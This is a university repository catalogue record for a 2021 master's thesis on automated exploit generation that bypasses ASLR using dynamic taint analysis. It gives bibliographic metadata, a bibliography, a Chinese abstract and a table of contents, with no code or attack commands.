利用動態程式分析繞過ASLR之軟體自動化脅迫生成

Wei Loon Mow; 毛偉倫

請用此 Handle URI 來引用此文件： http://tdr.lib.ntu.edu.tw/jspui/handle/123456789/81167

完整後設資料紀錄

DC 欄位	值	語言
dc.contributor.advisor	蕭旭君(Hsu-Chun Hsiao)
dc.contributor.author	Wei Loon Mow	en
dc.contributor.author	毛偉倫	zh_TW
dc.date.accessioned	2022-11-24T03:33:59Z	-
dc.date.available	2021-09-02
dc.date.available	2022-11-24T03:33:59Z	-
dc.date.copyright	2021-09-02
dc.date.issued	2021
dc.date.submitted	2021-08-12
dc.identifier.citation	[1] American Fuzzy Lop. [2] DEFCON CTF 2019 Qualifier Speedrun. [3] Pwntools: A CTF framework and exploit development library. [4] Qiling Framework: A True Instrumentable Binary Emulation Framework. [5] Taint analysis and pattern matching with Pin. [6] REX: Shellphish’s automated exploitation engine, originally created for the Cyber Grand Challenge, April 2021. [7] Zeratool: Automatic Exploit Generation (AEG) and remote flag capture for ex- ploitable CTF problems, April 2021. [8] Aschermann,C.,Schumilo,S.,Blazytko,T.,Gawlik,R.,andHolz,T.REDQUEEN: fuzzing with input-to-state correspondence. In 26th Annual Network and Distributed System Security Symposium, NDSS 2019, San Diego, California, USA, February 24- 27, 2019 (2019), The Internet Society. [9] Avgerinos, T., Cha, S. K., Rebert, A., Schwartz, E. J., Woo, M., and Brumley, D. Automatic exploit generation. Commun. ACM 57, 2 (Feb. 2014), 74–84. [10] Boehme, M., Cadar, C., and ROYCHOUDHURY, A. Fuzzing: Challenges and re- flections. IEEE Software 38, 03 (may 2021), 79–86. [11] Cha, S., Avgerinos, T., Rebert, A., and Brumley, D. Unleashing mayhem on binary code. 380–394. [12] Chipounov, V., Georgescu, V., Zamfir, C., and Candea, G. Selective symbolic exe- cution. [13] Eckert, M., Bianchi, A., Wang, R., Shoshitaishvili, Y., Kruegel, C., and Vigna, G. Heaphopper: Bringing bounded model checking to heap implementation security. In 27th USENIX Security Symposium (USENIX Security 18) (Baltimore, MD, 2018), USENIX Association. [14] Fioraldi,A.,D’Elia,D.C.,andBalzarotti,D.Theuseoflikelyinvariantsasfeedback for fuzzers. In 30th USENIX Security Symposium (USENIX Security 21) (Aug. 2021), USENIX Association. [15] Fioraldi, A., Maier, D., Eißfeldt, H., and Heuse, M. AFL++: Combining incremental steps of fuzzing research. In 14th USENIX Workshop on Offensive Technologies (WOOT 20) (Aug. 2020), USENIX Association. [16] Gisbert, H. M., and Ripoll, I. Exploiting linux and pax aslr’s weaknesses on 32-bit and 64-bit systems. [17] Heelan, S. Automatic generation of control flow hijacking exploits for software vul- nerabilities. PhD thesis, University of Oxford, 2009. [18] Herlands, W., Hobson, T., and Donovan, P. J. Effective entropy: Security-centric metric for memory randomization techniques. In 7th Workshop on Cyber Security Experimentation and Test (CSET 14) (San Diego, CA, Aug. 2014), USENIX Asso- ciation. [19] Huang, S.-K., Huang, M.-H., Huang, P.-Y., Lai, C.-W., Lu, H.-L., and Wai Meng, L. CRAX: Software Crash Analysis for Automatic Exploit Generation by Modeling Attacks as Symbolic Continuations. pp. 78–87. [20] Nguyen, M.-D., Bardin, S., Bonichon, R., Groz, R., and Lemerre, M. Binary-level directed fuzzing for use-after-free vulnerabilities, 2020. [21] Poeplau, S., and Francillon, A. Symbolic execution with SymCC: Don’t interpret, compile! In 29th USENIX Security Symposium (USENIX Security 20) (Aug. 2020), USENIX Association, pp. 181–198. [22] Ralston, A. De bruijn sequences-a model example of the interaction of discrete mathematics and computer science. Mathematics Magazine 55, 3 (1982), 131–143. [23] Roemer, R., Buchanan, E., Shacham, H., and Savage, S. Return-oriented program- ming: Systems, languages, and applications. ACM Trans. Inf. Syst. Secur. 15, 1 (Mar. 2012). [24] Schwartz, E. J., Avgerinos, T., and Brumley, D. All you ever wanted to know about dynamic taint analysis and forward symbolic execution (but might have been afraid to ask). In 2010 IEEE Symposium on Security and Privacy (2010), pp. 317–331. [25] Schwartz, E. J., Avgerinos, T., and Brumley, D. Q: Exploit hardening made easy. In 20th USENIX Security Symposium (USENIX Security 11) (San Francisco, CA, Aug. 2011), USENIX Association. [26] Serebryany, K., Bruening, D., Potapenko, A., and Vyukov, D. Addresssanitizer: A fast address sanity checker. In Proceedings of the 2012 USENIX Conference on An- nual Technical Conference (USA, 2012), USENIX ATC’12, USENIX Association, p. 28. [27] Wang, F., and Shoshitaishvili, Y. Angr - the next generation of binary analysis. In 2017 IEEE Cybersecurity Development (SecDev) (2017), pp. 8–9. [28] Wang, Y., Zhang, C., Xiang, X., Zhao, Z., Li, W., Gong, X., Liu, B., Chen, K., and Zou, W. Revery: From proof-of-concept to exploitable. pp. 1914–1927. [29] Yun, I., Kapil, D., and Kim, T. Automatic Techniques to Systematically Discover New Heap Exploitation Primitives. In Proceedings of the 29th USENIX Security Symposium (Security) (Aug. 2020).
dc.identifier.uri	http://tdr.lib.ntu.edu.tw/jspui/handle/123456789/81167	-
dc.description.abstract	ASLR 是一種用來防止攻擊成功的軟體保護機制，且在現今的系統中是預設開啟的保護機制。ASLR 是在每次程式執行的時候將不同區段的起始位址設在隨機的位址上，以便攻擊者沒辦法去猜測不同的區段的位址進行攻擊。在 ASLR 開啟的情況下，攻擊者需要做額外的資料洩漏來索取不同區段的起始位置才能使攻擊成功。不過，我們發現以往的軟體自動化脅迫生成技術都假設系統的 ASLR 保護機制是關閉的。因此，我們提出一個新的軟體自動話脅迫生成的技術 LAEG ，利用動態污點分析來分析給定的崩潰輸入來收集我們定義為輸入與輸出的資訊，利用這個資訊來偵測可能造成的資料洩漏，然後將洩漏出來的資訊還原程式不同區段的起始位址，再產生出可以繞過 ASLR 的攻擊腳本。我們的實驗結果證實 LAEG 可以成功繞過如 ASLR、PIE 以及 stack canary 的保護機制，而且比現今開源的軟體自動化脅迫生成工具 Zeratool 更快的生成攻擊腳本，甚至比人類成功攻擊的速度快了 6.46 至 45.15 倍。	zh_TW
dc.description.provenance	Made available in DSpace on 2022-11-24T03:33:59Z (GMT). No. of bitstreams: 1 U0001-0508202117214500.pdf: 893237 bytes, checksum: 7aa8ad61ab7ff14e5ad7f3044a58ac9f (MD5) Previous issue date: 2021	en
dc.description.tableofcontents	口試委員會審定書 iii 誌謝 v Acknowledgements vii 摘要 ix Abstract xi 1 Introduction 1 2 Background 3 2.1 Challenges in Automated Exploit Generation . . . . . . . . . . . . . . . 4 2.1.1 Preprocessing............................ 4 2.1.2 Bug Finding ............................ 5 2.1.3 Exploit Generation ......................... 5 2.2 Address Space Layout Randomization................... 5 2.3 Dynamic Taint Analysis .......................... 6 3 Motivating Example 9 3.1 Canary.................................... 10 3.2 PIE and ASLR ............................... 11 4 System Overview 13 4.1 Bug Finding................................. 14 4.2 Binary Analysis............................... 14 4.3 Exploit Generation ............................. 15 5 Bug Finding 17 5.1 Automated Vulnerability Discovery .................... 17 5.2 Custom Input ................................ 17 6 Binary Analysis 19 6.1 Dynamic Taint Analysis .......................... 19 6.2 Uninitialized Buffer Detection ....................... 21 6.3 Leak Detection ............................... 23 6.4 Seed Generation............................... 25 6.5 Exploitable State Detection......................... 25 7 Exploit Generation 27 7.1 Exploitable State .............................. 27 7.2 Input and Output States........................... 28 7.3 Exploit Recipe ............................... 29 7.4 Generate Exploit Script........................... 30 8 Evaluation 31 8.1 System Environment and CustomInput .................. 31 8.2 Target binary ................................ 31 8.3 RQ1: Effectiveness of LAEG ....................... 32 8.4 RQ2: Speed of LAEG vs Zeratool ..................... 33 8.5 RQ3: LAEG vs Binary Protection ..................... 34 8.6 Limitation and Discussion ......................... 35 8.6.1 False positive and false negative for LAEG information leak . . . 35 8.6.2 Real world binary.......................... 36 9 Related Work 37 9.1 Symbolic Execution Based AEG...................... 37 9.2 Bypassing ASLR .............................. 38 9.3 AEG Exploiting Heap Vulnerabilities ................... 38 9.4 Searching for Heap Exploitation Primitives . . . . . . . . . . . . . . . . 39 10 Future Work 41 11 Conclusion 43 Bibliography 45
dc.language.iso	en
dc.subject	ASLR	zh_TW
dc.subject	軟體自動化脅迫生成	zh_TW
dc.subject	動態污點分析	zh_TW
dc.subject	ASLR	en
dc.subject	Dynamic Taint Analysis	en
dc.subject	Automated Exploit Generation	en
dc.title	利用動態程式分析繞過ASLR之軟體自動化脅迫生成	zh_TW
dc.title	Bypassing ASLR with Dynamic Binary Analysis for Automated Exploit Generation	en
dc.date.schoolyear	109-2
dc.description.degree	碩士
dc.contributor.oralexamcommittee	黃世昆(Hsin-Tsai Liu),黃俊穎(Chih-Yang Tseng)
dc.subject.keyword	軟體自動化脅迫生成,動態污點分析,ASLR,	zh_TW
dc.subject.keyword	Automated Exploit Generation,Dynamic Taint Analysis,ASLR,	en
dc.relation.page	47
dc.identifier.doi	10.6342/NTU202102120
dc.rights.note	同意授權(限校園內公開)
dc.date.accepted	2021-08-12
dc.contributor.author-college	電機資訊學院	zh_TW
dc.contributor.author-dept	資訊工程學研究所	zh_TW
顯示於系所單位：	資訊工程學系

文件中的檔案：

檔案	大小	格式
U0001-0508202117214500.pdf 授權僅限NTU校內IP使用（校園外請利用VPN校外連線服務）	872.3 kB	Adobe PDF

顯示文件簡單紀錄

系統中的文件，除了特別指名其著作權條款之外，均受到著作權保護，並且保留所有的權利。